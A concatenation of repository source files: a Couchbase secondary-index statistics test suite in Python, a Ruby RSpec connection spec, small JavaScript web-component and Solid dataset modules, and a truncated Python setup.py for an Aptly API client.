expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
def test_key_size_distribution_objects(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
string_70 = "x" * 70
string_3000 = "x" * 3000
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : {"name": "%s", "fake": "%s"} })' % (string_70, string_3000)
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
expected_distr = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 1, u'(4097-102400)': 0, u'(1025-4096)': 1, u'(102401-max)': 1}")
expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
if self.flush_bucket:
rest.flush_bucket("default")
self.sleep(30)
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : {"name": "%s", "fake": "%s"} })' % (
string_70, string_3000)
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
expected_distr = []
common_distr = "{u'(0-64)': 0, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append(
"{u'(0-64)': 0, u'(257-1024)': 0, u'(65-256)': 1, u'(4097-102400)': 0, u'(1025-4096)': 1, u'(102401-max)': 1}")
expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
def test_key_size_distribution_dml(self):
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
string_103000 = "x" * 103000
update_query = "UPDATE default SET name = '%s' WHERE name = 'employee-9'" % string_103000
self.n1ql_helper.run_cbq_query(query=update_query,
server=self.n1ql_node)
expected_distr = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2000, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 16}")
expected_distr.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
delete_query = "delete from default where name = 'employee-6'"
self.n1ql_helper.run_cbq_query(query=delete_query,
server=self.n1ql_node)
expected_distr2 = []
common_distr = "{u'(0-64)': 1944, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr2.append("{u'(0-64)': 1872, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 72}")
expected_distr2.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr2)
def test_arrkey_size_distribution(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
doc = {"indexer.statsPersistenceInterval": 60}
rest.set_index_settings_internal(doc)
string_70 = "x" * 70
string_260 = "x" * 260
string_1030 = "x" * 1030
string_5000 = "x" * 5000
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : ["%s","",null] })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : ["%s"] })' % string_260
insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : ["%s"] })' % string_1030
insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : ["%s","string1"] })' % string_5000
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : ["%s", "string2"] })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : ["%s"] })' % string_5000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
create_index_query1 = "CREATE INDEX idx ON default(distinct name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
create_index_query3 = "CREATE INDEX idx ON standard_bucket0(distinct name) USING GSI"
create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
expected_distr = "{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}"
expected_distr2 = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}"
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_arrkey_size(index_map, 'default', expected_distr)
self.verify_arrkey_size(index_map, 'standard_bucket0', expected_distr2)
self.sleep(60)
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
self.sleep(30)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_arrkey_size(index_map, 'default', expected_distr)
self.verify_arrkey_size(index_map, 'standard_bucket0', expected_distr2)
def test_keysize_rebalance_out(self):
rest = RestConnection(self.master)
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI WITH {'nodes': ['%s:%s']}" % (self.servers[1].ip, self.servers[1].port)
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI WITH {'nodes': ['%s:%s']}" % (self.servers[1].ip, self.servers[1].port)
create_index_query3 = "CREATE INDEX idx ON standard_bucket0(name) USING GSI"
create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
string_70 = "x" * 70
string_260 = "x" * 260
string_1030 = "x" * 1030
string_5000 = "x" * 5000
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : "%s" })' % string_260
insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : "%s" })' % string_1030
insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
expected_distr = []
expected_distr2 = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}")
expected_distr.append(common_distr)
expected_distr2.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}")
expected_distr2.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
# remove the n1ql node which is being rebalanced out
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [self.servers[1]])
reached = RestHelper(rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
def test_keysize_rebalance_in(self):
rest = RestConnection(self.master)
if self.move_index:
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI "
create_index_query3 = "CREATE INDEX idx ON standard_bucket0(name) USING GSI"
create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
string_70 = "x" * 70
string_260 = "x" * 260
string_1030 = "x" * 1030
string_5000 = "x" * 5000
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : "%s" })' % string_260
insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : "%s" })' % string_1030
insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
expected_distr = []
expected_distr2 = []
common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}")
expected_distr.append(common_distr)
expected_distr2.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}")
expected_distr2.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
reached = RestHelper(rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
if not self.move_index:
create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
self.n1ql_helper.run_cbq_query(query=create_index_query1, server=self.n1ql_node)
else:
alter_index_query = 'ALTER INDEX default.idx WITH {{"action":"move","nodes": ["{0}:{1}"]}}'.format(self.servers[self.nodes_init].ip, self.servers[self.nodes_init].port)
self.n1ql_helper.run_cbq_query(query=alter_index_query, server=self.n1ql_node)
self.sleep(20)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr)
self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
def verify_key_size(self, index_map, bucket, expected_distr):
for index in index_map[bucket]:
if index == 'idx':
self.log.info(index_map[bucket][index]['key_size_distribution'])
self.assertTrue(str(index_map[bucket][index]['key_size_distribution']) == expected_distr[0])
else:
self.log.info(index_map[bucket][index]['key_size_distribution'])
self.assertTrue(str(index_map[bucket][index]['key_size_distribution']) == expected_distr[1])
def verify_arrkey_size(self, index_map, bucket, expected_distr):
for index in index_map[bucket]:
if index == 'idx':
self.log.info(index_map[bucket][index]['arrkey_size_distribution'])
self.assertTrue(str(index_map[bucket][index]['arrkey_size_distribution']) == expected_distr)
else:
self.assertTrue("arrkey_size_distribution" not in str(index_map[bucket][index]))
def test_num_scan_timeouts(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
shell = RemoteMachineShellConnection(self.master)
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
shell.execute_cbworkloadgen(rest.username, rest.password, 1000000, 70, 'default', 1024, '-j')
doc = {"indexer.settings.scan_timeout": 10}
rest.set_index_settings(doc)
query_params = {'scan_consistency': 'request_plus'}
select_query = "SELECT age from default"
self.n1ql_helper.run_cbq_query(query=select_query, server=self.n1ql_node, query_params=query_params)
index_map = self.get_index_stats()
official_stats = rest.get_index_official_stats()
self.log.info(index_map)
self.log.info(official_stats)
def test_avg_scan_latency(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
create_index_query = "CREATE INDEX idx ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
if self.expected_err_msg not in str(ex):
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
else:
self.log.info("Index creation failed as expected")
select_query = "SELECT count(name) from default"
# Run select query 10 times
for i in range(0, 10):
self.n1ql_helper.run_cbq_query(query=select_query,
server=self.n1ql_node)
index_map = self.get_index_stats()
official_stats = rest.get_index_official_stats()
self.log.info(index_map)
self.log.info(official_stats)
self.assertTrue(index_map['default']['idx']['avg_scan_latency'] == official_stats['default:idx']['avg_scan_latency'])
def test_initial_build_progress(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
create_index_query = "CREATE INDEX idx ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
init_time = time.time()
check = False
next_time = init_time
while not check:
index_status = rest.get_index_official_stats()
self.log.info(index_status)
if index_status['default:idx']['initial_build_progress'] == 100:
check = True
else:
check = False
time.sleep(1)
next_time = time.time()
check = check or (next_time - init_time > 60)
official_stats = rest.get_index_official_stats()
self.log.info(official_stats)
self.assertTrue(official_stats['default:idx']['initial_build_progress'] == 100)
def test_num_items_flushed(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
official_stats = rest.get_index_official_stats()
self.log.info(official_stats)
self.assertTrue(official_stats['default:idx']['num_items_flushed'] == self.docs_per_day*2016)
def test_avg_drain_rate(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
shell = RemoteMachineShellConnection(self.master)
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
shell.execute_cbworkloadgen(rest.username, rest.password, <PASSWORD>, 70, 'default', 1024, '-j')
official_stats = rest.get_index_official_stats()
index_map = self.get_index_stats()
self.log.info(index_map)
self.log.info(official_stats)
self.assertTrue(index_map['default']['idx']['avg_drain_rate'] == official_stats['default:idx']['avg_drain_rate'])
def test_index_stats(self):
"""
Tests index stats when indexes are created and dropped
"""
#Create Index
self.run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = True, drop_index = False)
#Check Index Stats
self.sleep(30)
index_map = self.get_index_stats()
self.log.info(index_map)
for query_definition in self.query_definitions:
index_name = query_definition.index_name
for bucket in self.buckets:
bucket_name = bucket.name
check_keys = ['items_count', 'total_scan_duration', 'num_docs_queued',
'num_requests', 'num_rows_returned', 'num_docs_queued',
'num_docs_pending', 'delete_bytes' ]
map = self._create_stats_map(items_count=2016)
self._verify_index_stats(index_map, index_name, bucket_name, map, check_keys)
def test_index_storage_stats(self):
indexer_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = True, drop_index = False)
for node in indexer_nodes:
indexer_rest = RestConnection(node)
content = indexer_rest.get_index_storage_stats()
for index in list(content.values()):
for stats in list(index.values()):
self.log.info("MainStore Stats - {0}: {1}".format(
index, stats["MainStore"]))
self.log.info("BackStore Stats - {0}: {1}".format(
index, stats["BackStore"]))
self.assertEqual(stats["MainStore"]["resident_ratio"], 1.00,
"Resident ratio not 1")
def test_indexer_logs_for_leaked_password(self):
expected_msg = "http://%40index-cbauth@127.0.0.1:8091"
indexers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
self.assertGreater(len(indexers), 0, "No indexer found in cluster")
for server in indexers:
shell = RemoteMachineShellConnection(server)
_, dir = RestConnection(server).diag_eval('filename:absname('
'element(2, '
'application:get_env('
'ns_server, error_logger_mf_dir))).')
indexer_log = str(dir) + '/indexer.log*'
count, err = shell.execute_command("zgrep \"{0}\" {1} | wc -l".
format(expected_msg, indexer_log))
if isinstance(count, list):
count = int(count[0])
else:
count = int(count)
shell.disconnect()
self.assertGreater(count, 0, "Password leak found in Indexer {0}".format(server.ip))
def test_get_index_settings(self):
#Check Index Settings
map = self.get_index_settings()
for node in list(map.keys()):
val = map[node]
gen = self._create_settings_map()
for key in list(gen.keys()):
self.assertTrue(key in list(val.keys()), "{0} not in {1} ".format(key, val))
def test_set_index_settings(self):
#Check Index Settings
map1 = self._set_settings_map()
self.log.info(map1)
self.set_index_settings(map1)
map = self.get_index_settings()
for node in list(map.keys()):
val = map[node]
for key in list(map1.keys()):
self.assertTrue(key in list(val.keys()), "{0} not in {1} ".format(key, val))
def _verify_index_stats(self, index_map, index_name, bucket_name, index_stat_values, check_keys=None):
self.assertIn(bucket_name, list(index_map.keys()), "bucket name {0} not present in stats".format(bucket_name))
self.assertIn(index_name, list(index_map[bucket_name].keys()),
"index name {0} not present in set of indexes {1}".format(index_name,
list(index_map[bucket_name].keys())))
for key in list(index_stat_values.keys()):
self.assertIn(key, list(index_map[bucket_name][index_name].keys()),
"stats {0} not present in Index stats {1}".format(key,
index_map[bucket_name][index_name]))
if check_keys:
if key in check_keys:
self.assertEqual(str(index_map[bucket_name][index_name][key]), str(index_stat_values[key]),
" for key {0} : {1} != {2}".format(key,
index_map[bucket_name][index_name][key],
index_stat_values[key]))
else:
self.assertEqual(str(index_stat_values[key]), str(index_map[bucket_name][index_name][key]),
" for key {0} : {1} != {2}".format(key,
index_map[bucket_name][index_name][key],
index_stat_values[key]))
def set_index_settings(self, settings):
servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
for server in servers:
RestConnection(server).set_index_settings(settings)
def get_index_settings(self):
servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
index_settings_map = {}
for server in servers:
key = "{0}:{1}".format(server.ip, server.port)
index_settings_map[key] = RestConnection(server).get_index_settings()
return index_settings_map
def _create_stats_map(self, items_count = 0, total_scan_duration = 0,
delete_bytes = 0, scan_wait_duration = 0, insert_bytes = 0,
num_rows_returned = 0, num_docs_indexed = 0, num_docs_pending = 0,
scan_bytes_read = 0, get_bytes = 0, num_docs_queued = 0,num_requests = 0,
disk_size = 0):
map = {}
map['items_count'] = items_count
map['disk_size'] = disk_size
map['items_count'] = items_count
map['total_scan_duration'] = total_scan_duration
map['delete_bytes'] = delete_bytes
map['scan_wait_duration'] = scan_wait_duration
map['insert_bytes'] = insert_bytes
map['num_rows_returned'] = num_rows_returned
map['num_docs_indexed'] = num_docs_indexed
map['num_docs_pending'] = num_docs_pending
map['scan_bytes_read'] = scan_bytes_read
map['get_bytes'] = get_bytes
map['num_docs_queued'] = num_docs_queued
map['num_requests'] = num_requests
return map
def _create_settings_map(self):
map = { "indexer.settings.recovery.max_rollbacks" : 5,
"indexer.settings.bufferPoolBlockSize" : 16384,
"indexer.settings.max_cpu_percent" : 400,
"queryport.client.settings.poolOverflow" : 30,
"indexer.settings.memProfile" : False,
"indexer.settings.statsLogDumpInterval" : 60,
"indexer.settings.persisted_snapshot.interval" : 5000,
"indexer.settings.inmemory_snapshot.interval" : 200,
"indexer.settings.compaction.check_period" : 30,
"indexer.settings.largeSnapshotThreshold" : 200,
"indexer.settings.log_level" : "debug",
"indexer.settings.scan_timeout" : 120000,
"indexer.settings.maxVbQueueLength" : 0,
"indexer.settings.send_buffer_size" : 1024,
"indexer.settings.compaction.min_size" : 1048576,
"indexer.settings.cpuProfDir" : "",
"indexer.settings.memory_quota" : 268435456,
"indexer.settings.memProfDir" : "",
"projector.settings.log_level" : "debug",
"queryport.client.settings.poolSize" : 1000,
"indexer.settings.max_writer_lock_prob" : 20,
"indexer.settings.compaction.interval" : "00:00,00:00",
"indexer.settings.cpuProfile" : False,
"indexer.settings.compaction.min_frag" : 30,
"indexer.settings.sliceBufSize" : 50000,
"indexer.settings.wal_size" : 4096,
"indexer.settings.fast_flush_mode" : True,
"indexer.settings.smallSnapshotThreshold" : 30,
"indexer.settings.persisted_snapshot_init_build.interval": 5000
}
return map
def _set_settings_map(self):
map = { "indexer.settings.recovery.max_rollbacks" : 4,
"indexer.settings.bufferPoolBlockSize" : 16384,
"indexer.settings.max_cpu_percent" : 400,
"indexer.settings.memProfile" : False,
"indexer.settings.statsLogDumpInterval" : 60,
"indexer.settings.persisted_snapshot.interval" : 5000,
"indexer.settings.inmemory_snapshot.interval" : 200,
"indexer.settings.compaction.check_period" : 31,
"indexer.settings.largeSnapshotThreshold" : 200,
"indexer.settings.log_level" : "debug",
"indexer.settings.scan_timeout" : 120000,
"indexer.settings.maxVbQueueLength" : 0,
"indexer.settings.send_buffer_size" : 1024,
"indexer.settings.compaction.min_size" : 1048576,
"indexer.settings.cpuProfDir" : "",
"indexer.settings.memory_quota" : 268435456,
"indexer.settings.memProfDir" : "",
"indexer.settings.persisted_snapshot_init_build.interval": 5000,
"indexer.settings.max_writer_lock_prob" : 20,
"indexer.settings.compaction.interval" : "00:00,00:00",
"indexer.settings.cpuProfile" : False,
"indexer.settings.compaction.min_frag" : 31,
"indexer.settings.sliceBufSize" : 50000,
"indexer.settings.wal_size" : 4096,
"indexer.settings.fast_flush_mode" : True,
"indexer.settings.smallSnapshotThreshold" : 30,
"projector.settings.log_level" : "debug",
"queryport.client.settings.poolSize" : 1000,
"queryport.client.settings.poolOverflow" : 30
}
return map
|
jmarianer/scorm_engine
|
spec/scorm_engine/faraday/connection_spec.rb
|
<reponame>jmarianer/scorm_engine
RSpec.describe ScormEngine::Faraday::Connection do
before do
ScormEngine.configure do |config|
config.host = "scorm.engine"
config.username = "admin"
config.password = "<PASSWORD>"
end
end
describe "#base_uri" do
let(:uri) { scorm_engine_client.base_uri }
it "returns a URI::HTTPS instance" do
expect(uri).to be_a(URI::HTTPS)
end
it "is correct given the configuration" do
expect(uri.to_s).to eq "https://scorm.engine/ScormEngineInterface/api/v1/"
end
end
end
|
easylogic/editor
|
src/editor-layouts/designeditor/web-component/MyElement.js
|
import createEmotion from '@emotion/css/create-instance';
import UIElement from 'el/sapa/UIElement';
import WebComponent from 'el/sapa/WebComponent';
import SecondElement from './SecondElement';
import { uuidShort } from 'el/utils/math';
export default class MyElement extends UIElement {
static get attributes () {
return ['key', 'value', 'class', 'style']
}
static get style() {
return `
background-color: blue;
.my-element {
background-color: red;
}
`
}
afterRender() {
if (!this.__localStyle) {
const { css } = createEmotion({
key: uuidShort().replace(/[0-9]/g, ''),
container: this.$el.el
})
this.__localStyle = css(MyElement.style)
this.$el.addClass(this.__localStyle);
}
}
components() {
return {
SecondElement
}
}
template() {
const {key, value} = this.props;
return `
<div>나만의 element {key=${key}, value=${value}}}
<div class="my-element">red</div>
<object refClass="SecondElement" />
</div>`
}
}
customElements.define('my-element', WebComponent(MyElement))
|
acoburn/pod-browser
|
src/models/dataset/index.js
|
<reponame>acoburn/pod-browser
/**
* Copyright 2020 Inrupt Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal in
* the Software without restriction, including without limitation the rights to use,
* copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
* Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
* INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
* HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
* OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
import {
createSolidDataset,
getSolidDataset,
saveSolidDatasetAt,
} from "@inrupt/solid-client";
import { ERROR_CODES, isHTTPError } from "../../error";
import { chain } from "../../solidClientHelpers/utils";
/*
* Datasets refer to SolidDataset from @inrupt/solid-client.
* This module adds some extra custom, handy functions.
*/
/* Model functions */
export async function getOrCreateDataset(url, fetch) {
try {
return await getSolidDataset(url, { fetch });
} catch (error) {
if (isHTTPError(error, ERROR_CODES.NOT_FOUND)) return createSolidDataset();
throw error;
}
}
export async function updateOrCreateDataset(url, fetch, ...operations) {
const dataset = await getOrCreateDataset(url, fetch);
return saveSolidDatasetAt(url, chain(dataset, ...operations), { fetch });
}
|
cyril-s/aptly-ctl
|
setup.py
|
<filename>setup.py
#!/usr/bin/env python3
from setuptools import setup, find_packages
from aptly_ctl import __version__
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name="aptly-ctl",
version=__version__,
packages=find_packages(exclude=["tests"]),
license="MIT",
author="<NAME>",
author_email="<EMAIL>",
description="Convenient command line Aptly API client",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/cyril-s/aptly-ctl",
install_requires=["aptly-api-client <=0.2.1", "PyYAML", "requests", "fnvhash"],
python_requires=">=3",
entry_points={
